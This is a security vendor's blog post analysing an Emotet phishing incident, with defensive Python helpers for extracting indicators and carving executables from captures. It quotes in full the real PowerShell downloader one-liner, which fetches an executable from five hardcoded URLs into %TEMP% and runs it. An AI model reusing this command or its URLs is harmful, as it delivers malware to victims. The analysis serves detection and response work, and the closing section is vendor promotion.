Blog – Detecting Emotet Malspam


Introduction to Emotet Malspam

Recently, one of Cyberseer’s clients was hit with a “Malspam” campaign aiming to plant the Emotet malware within its network. The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.

What is Emotet?

Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1], with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine. Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL. Upon opening the malicious document, a combination of obfuscated VBA scripts / macros instructs the target machine to download a remote payload consisting of a number of different modules.

Figure 1 – Emotet Activity [2]

Previously downloaded payloads have included:

  • Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
  • Email client infostealer – Steals e-mail credentials from email client software.
  • Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
  • PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.

Detection of Emotet

Figure 2 – Emotet Infection Chain [3]

With the first stage of the attack being an e-mail attachment, it makes sense to start by analysing the Word document that landed in the victims’ inboxes.

As stated in the previous section, when a user opens the document and enables macros, a VBA script runs. That script in turn launches the following PowerShell command to pull files from remote locations:

powershell.exe powershell $fbq='IkL';$qdr='http://danzarspiritandtruth.com/J7B5TiAIp@http://littlepeonyphotos.ru/jPGDyvIm@http://iuyouth.hcmiu.edu.vn/mVayv0I7S@http://exploraverde.co/mmR4TaGu8@http://turkaline.com/zGiFH0X'.Split('@');$siF=([System.IO.Path]::GetTempPath()+'\zEl.exe');$wjS =New-Object -com 'msxml2.xmlhttp';$TMS = New-Object -com 'adodb.stream';foreach($PJC in $qdr){try{$wjS.open('GET',$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}

The command contains five hardcoded URLs, each serving a payload. The script walks the list in order: it fetches each URL with the msxml2.xmlhttp COM object, writes the response body to %TEMP%\zEl.exe through adodb.stream, runs it with Start-Process, and breaks out of the loop after the first URL that succeeds (any failure is swallowed by the empty catch block and the next URL is tried). Connections to these URLs are how Cyberseer analysts first identified the incident: as soon as a host reached out to one of them, the signatureless behavioural models alerted first on the connections to the domains and then on the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment.
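To triage a command like this in bulk, for example from PowerShell script-block logs (Event ID 4104) or EDR process-creation events, the following Python helper pulls out the '@'-joined URL list, the drop filename under %TEMP% and the COM download idiom. It is an added example for this post, not Cyberseer’s tooling or anything from the Emotet sample itself; the sample input is the one-liner above with straight quotes, and the regular expressions and the marker list are assumptions about this particular downloader pattern rather than a general Emotet signature.

```python
"""Pull IOCs out of an Emotet-style PowerShell downloader command.

Added example for this post; not Cyberseer's tooling. Input is the command line as
recorded by PowerShell script-block logging (Event ID 4104) or an EDR
process-creation event. The regexes encode assumptions about this downloader
pattern (a quoted '@'-joined URL list, a GetTempPath() drop path); they are not a
general Emotet signature.
"""
import re
from urllib.parse import urlsplit

# The one-liner shown in the post, with straight quotes, used here as sample input.
SAMPLE_COMMAND = (
    "powershell.exe powershell $fbq='IkL';"
    "$qdr='http://danzarspiritandtruth.com/J7B5TiAIp@http://littlepeonyphotos.ru/jPGDyvIm@"
    "http://iuyouth.hcmiu.edu.vn/mVayv0I7S@http://exploraverde.co/mmR4TaGu8@"
    "http://turkaline.com/zGiFH0X'.Split('@');"
    "$siF=([System.IO.Path]::GetTempPath()+'\\zEl.exe');"
    "$wjS =New-Object -com 'msxml2.xmlhttp';$TMS = New-Object -com 'adodb.stream';"
    "foreach($PJC in $qdr){try{$wjS.open('GET',$PJC,0);$wjS.send();$TMS.open();"
    "$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);"
    "Start-Process $siF;break}catch{}}"
)

# Curly quotes survive copy/paste from web pages and tickets; normalise them first.
_QUOTE_MAP = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})

# A quoted run of URLs immediately followed by .Split('@'): the payload list.
URL_LIST_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]\s*\.Split\(['"]@['"]\)""", re.IGNORECASE)
# GetTempPath() + '\name.exe': where the downloaded payload is written.
DROP_RE = re.compile(r"""GetTempPath\(\)\s*\+\s*['"]\\{1,2}([^'"\\]+)['"]""", re.IGNORECASE)
# Building blocks of this downloader; three or more together is a strong hint (assumption).
MARKERS = ("msxml2.xmlhttp", "adodb.stream", ".savetofile(", "start-process", "gettemppath()")


def defang(url: str) -> str:
    """Render a URL safe to paste into a report or ticket (hxxp://host[.]tld/...)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").replace(".", "[.]")
    return f"{parts.scheme.replace('http', 'hxxp')}://{host}{parts.path}"


def extract_iocs(command: str) -> dict:
    """Return the URL list, the domains, the drop filename and which markers were seen."""
    cmd = command.translate(_QUOTE_MAP)
    match = URL_LIST_RE.search(cmd)
    urls = [u for u in match.group(1).split("@") if u] if match else []
    drop = DROP_RE.search(cmd)
    low = cmd.lower()
    hits = [k for k in MARKERS if k in low]
    return {
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "domains": sorted({urlsplit(u).hostname for u in urls}),
        "drop_file": drop.group(1) if drop else None,
        "markers": hits,
        # All three signals together: a URL list, a %TEMP% drop path and the COM download idiom.
        "looks_like_emotet_downloader": bool(urls) and drop is not None and len(hits) >= 3,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_COMMAND).items():
        print(f"{key}: {value}")
```

The extracted domains are what to pivot on in proxy or DNS logs to find every host that fetched a payload, and the drop filename is what to look for on disk and in process-creation telemetry; the defanged forms are for the report.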


Figure 3 – Initial connections

Pivoting into the network logs, a quick search for connections to the external domains reveals that five users’ devices had fallen victim to this attack:


Figure 4 – Devices associated

Drilling deeper into the connections from one of the associated devices and looking at the PCAP, we can confirm the download of the malicious payloads:

Figure 5 – Executable seen in PCAP

Carving the payloads from the PCAP yields the following two executables (file hash and VirusTotal report):

  • dd975e74625cdd2959005dc9043f4c26 – https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection
  • 9a2c288270459e95d915b8eaee7f65da – https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection
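Carving by hand in Wireshark (File > Export Objects > HTTP) is fine for a handful of sessions; to repeat the carving and hashing step across many captures, the following Python does the same thing programmatically. It is an added example rather than Cyberseer’s own tooling: it walks the HTTP responses in a reassembled server-to-client stream, keeps bodies whose DOS header points at a valid PE signature, and hashes them for the VirusTotal lookup in the URL form used above. The HTTP exchange and the stand-in executable are constructed for the example, and the carver assumes responses with a Content-Length header (chunked transfer encoding is not handled).

```python
"""Carve Windows executables out of reassembled HTTP responses and hash them.

Added example for this post; not Cyberseer's tooling. It assumes a reassembled
server-to-client TCP stream (e.g. Wireshark's "Follow TCP Stream" saved as raw
bytes) containing HTTP/1.x responses with Content-Length headers; chunked
transfer encoding is not handled. The HTTP exchange and the stand-in executable
below are constructed for the example.
"""
import hashlib
import struct


def build_fake_pe(filler: int = 200) -> bytes:
    """Constructed stand-in for a downloaded payload: a DOS header whose e_lfanew
    points at a PE signature, then filler bytes. It is not a runnable program."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))
    pe = b"PE\x00\x00" + struct.pack("<HH", 0x014C, 0)  # IMAGE_FILE_MACHINE_I386, 0 sections
    return dos + pe + b"\x90" * filler


def http_response(status: bytes, ctype: bytes, body: bytes) -> bytes:
    """Constructed HTTP/1.1 response carrying a Content-Length header."""
    return (b"HTTP/1.1 " + status + b"\r\nContent-Type: " + ctype +
            b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# The downloader walks its URL list until one works: a 404 for the first URL, then the payload.
SAMPLE_STREAM = (
    http_response(b"404 Not Found", b"text/html", b"<html><body>Not Found</body></html>")
    + http_response(b"200 OK", b"application/octet-stream", build_fake_pe())
)


def split_responses(stream: bytes) -> list:
    """Split a raw response stream into (status line, headers, body) tuples."""
    out, pos = [], 0
    while True:
        start = stream.find(b"HTTP/1.", pos)
        if start < 0:
            break
        hdr_end = stream.find(b"\r\n\r\n", start)
        if hdr_end < 0:
            break
        lines = stream[start:hdr_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = hdr_end + 4
        length = int(headers.get("content-length") or 0)
        body = stream[body_start:body_start + length]
        out.append((lines[0], headers, body))
        pos = body_start + length
    return out


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_executables(stream: bytes) -> list:
    """One record per PE body: size, completeness, hashes and the VirusTotal lookup URL
    in the form the post uses. A body shorter than its Content-Length means the capture
    was truncated, and the hashes will then not match the file that landed on disk."""
    found = []
    for status, headers, body in split_responses(stream):
        if not looks_like_pe(body):
            continue
        sha256 = hashlib.sha256(body).hexdigest()
        found.append({
            "status": status,
            "content_type": headers.get("content-type", ""),
            "size": len(body),
            "complete": len(body) == int(headers.get("content-length") or 0),
            "md5": hashlib.md5(body).hexdigest(),
            "sha256": sha256,
            "virustotal": f"https://www.virustotal.com/#/file/{sha256}/detection",
        })
    return found


if __name__ == "__main__":
    for record in carve_executables(SAMPLE_STREAM):
        print(record)
```

Look up the hash before uploading anything: the carved file is a client artefact, and a VirusTotal hash search leaks nothing, whereas an upload publishes the sample. Treat a record with complete set to False as unhashable evidence and go back to the endpoint for the file.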

Cyberseer analysts were able to investigate the files rapidly and contact the client. Fortunately the downloaded executables were unable to run because of permission restrictions on the affected machines, which allowed them to be quarantined and remediated before any further compromise could occur.

Conclusion

This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, previously unseen threats. A machine-learnt behavioural approach to security is able to detect such threats ahead of traditional solutions, allowing a faster response to potential breaches. Security technologies that rely on signatures and blacklists being updated will always be one step behind the attackers and will not detect new, unknown threats in real time.

Cyberseer’s threat detection and analysis managed security service bridges the gaps in an organisation’s cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation. Understanding your organisation’s threat score and dealing with live issues early decreases incident response times and significantly reduces the risk of cyber damage.

Sources:
[1] https://www.proofpoint.com/sites/default/files/pfpt-us-tr-q118-quarterly-threat-report.pdf
[2] https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/
[3] http://www.malware-traffic-analysis.net/2018/11/16/index.html
